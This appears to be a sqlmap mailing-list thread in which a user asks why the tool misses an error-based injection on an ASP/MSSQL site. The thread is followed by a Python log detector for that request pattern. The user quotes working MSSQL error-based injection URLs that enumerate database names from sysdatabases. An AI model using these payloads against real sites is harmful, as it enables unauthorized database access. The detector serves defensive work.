sqlmap supports string injections, but not with the following
error-based payload. It will come in the long run.
Cheers,
B
On Sun, Dec 6, 2009 at 15:55, One Time <one...@ym...> wrote:
> Hi,
> Does sqlmap support string injections?
> I'm asking this because I'm testing sqlmap on my company site (ASP + MSSQL
> 2000) which is vulnerable to SQL injection.
>
> Example:
> www.xyz.com/default.asp?pag=anypage.asp
> "pag" is the injectable parameter
>
> I'm able to successfully enumerate users and databases using sqlmap only via
> blind SQL injection because for some reason other supported SQL injection
> methods fail with the error: "[WARNING] for some reasons it was not possible
> to retrieve the query output through inband SQL injection technique, sqlmap
> is going blind"
>
> Using other scanners I noticed that it is possible to dump data (for example
> databases listing) using queries like these:
> www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as
> nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top
> 27 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t
> order by [dbid] desc)--
> www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as
> nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top
> 28 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t
> order by [dbid] desc)--
> www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as
> nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top
> 29 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t
> order by [dbid] desc)--
> etc.
> This method is really fast (behind a proxy too) compared to the extreme
> slowness of a blind SQL injection.
>
> Why doesn't sqlmap detect this type of injection?
>
> Thank you
> Regards
--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
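
A defender-side check for the request pattern described in this thread, as an added example that is not part of the original messages or of sqlmap: it URL-decodes each query string, looks for the integer-versus-subselect comparison, the string cast and the system-catalog reference seen in the quoted requests, and flags a client that steps the inner TOP counter. The (client, URI) log shape, the client addresses, the thresholds and all function names are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, quote, urlsplit

# Signals taken from the requests quoted in the thread (MSSQL error-based extraction).
SIGNALS = {
    "int_eq_subselect": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\(\s*select\b", re.I),
    "cast_to_string": re.compile(r"\b(?:cast|convert)\s*\([^)]*\bn?(?:var)?char\b", re.I),
    "system_catalog": re.compile(r"\bsys(?:databases|objects|columns)\b|\binformation_schema\b", re.I),
}
# The inner "select top N" is the row cursor that the quoted requests increment.
INNER_TOP = re.compile(r"from\s*\(\s*select\s+top\s+(\d+)\b", re.I)

def score(uri):
    """Return (sorted signal names, inner TOP counter or None) for one request URI."""
    values = " ".join(v for _, v in parse_qsl(urlsplit(uri).query, keep_blank_values=True))
    hits = sorted(name for name, rx in SIGNALS.items() if rx.search(values))
    m = INNER_TOP.search(values)
    return hits, int(m.group(1)) if m else None

def detect(log, min_signals=2, min_run=3):
    """Map client -> (first, last) TOP counter when it steps N, N+1, ... min_run times."""
    counters = defaultdict(list)
    for client, uri in log:
        hits, top_n = score(uri)
        if len(hits) >= min_signals and top_n is not None:
            counters[client].append(top_n)
    alerts = {}
    for client, seen in counters.items():
        run = longest = 1
        for prev, cur in zip(seen, seen[1:]):
            run = run + 1 if cur == prev + 1 else 1
            longest = max(longest, run)
        if longest >= min_run:
            alerts[client] = (seen[0], seen[-1])
    return alerts

# Constructed sample: hypothetical client addresses; query text shortened from the thread.
PAYLOAD = ("anypage.asp' and 0=(select top 1 cast([name] as nvarchar(256)) "
           "from(select top {n} dbid,name from [master].[dbo].[sysdatabases] "
           "order by [dbid]) t order by [dbid] desc)--")
SAMPLE_LOG = [("198.51.100.7", "/default.asp?pag=anypage.asp"),
              ("198.51.100.7", "/default.asp?pag=select_top_offers.asp")]
SAMPLE_LOG += [("203.0.113.9", "/default.asp?pag=" + quote(PAYLOAD.format(n=n)))
               for n in (27, 28, 29)]

if __name__ == "__main__":
    print(detect(SAMPLE_LOG))
```

Requiring two signals plus a stepping counter keeps page names that merely contain words such as "select" or "top" from alerting.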